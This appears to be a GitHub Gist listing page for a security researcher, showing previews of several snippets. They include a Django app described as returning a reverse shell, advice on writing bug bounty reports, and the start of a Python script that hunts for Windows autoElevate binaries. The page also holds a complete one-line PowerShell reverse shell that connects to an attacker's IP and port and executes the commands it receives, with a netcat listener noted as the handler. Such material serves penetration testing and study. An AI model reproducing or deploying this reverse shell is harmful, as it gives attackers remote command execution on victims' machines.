Skip to content

Instantly share code, notes, and snippets.

riyazwalikar /
Created June 1, 2022 04:50
Simple django app that returns a reverse shell when an IP is passed to it.
from distutils.log import error
import sys, socket,os,pty
from django.conf import settings
from django.urls import include, re_path
from django.http import HttpResponse
riyazwalikar /
Last active March 17, 2020 19:35
how to write a good bug bounty report

How to write a good bug bounty report

  1. Use simple words and avoid complex phrases. Use headings for your report sections.
  2. Mention if authentication is required to exploit the issue.
  3. If authentication is required, elaborate on the privilege required (admin, guest etc.), if applicable
  4. Provide the URL where exploit payload is consumed and the parameter/header component which is affected
  5. Include HTTP request, responses for multi step bugs
  6. Steps to reproduce the issue should ideally have been written from the point of a user/attacker of the system.
  7. In the Steps to reproduce, avoid jumping directly to the URL/parameter being exploited. Don't do 1. Go to, 2. Change 23 to -1. This will not provide context to the reader.
  8. If possible mention what you think the expected output should be and what you see instead
riyazwalikar / reverse-shell-powershell.gist
Last active March 30, 2019 10:47
PowerShell reverse shell - handler nc -lvp
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('IP',PORT);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
riyazwalikar /
Last active April 17, 2022 12:34
Python script to find all Windows binaries with autoElevate=True (uses sigcheck obviously)
# Usage: C:\Windows\System32\
# Needs sigcheck.exe in path []
import sys
import os
import glob
import subprocess
if len(sys.argv) < 2:
print "Usage: <PATH>"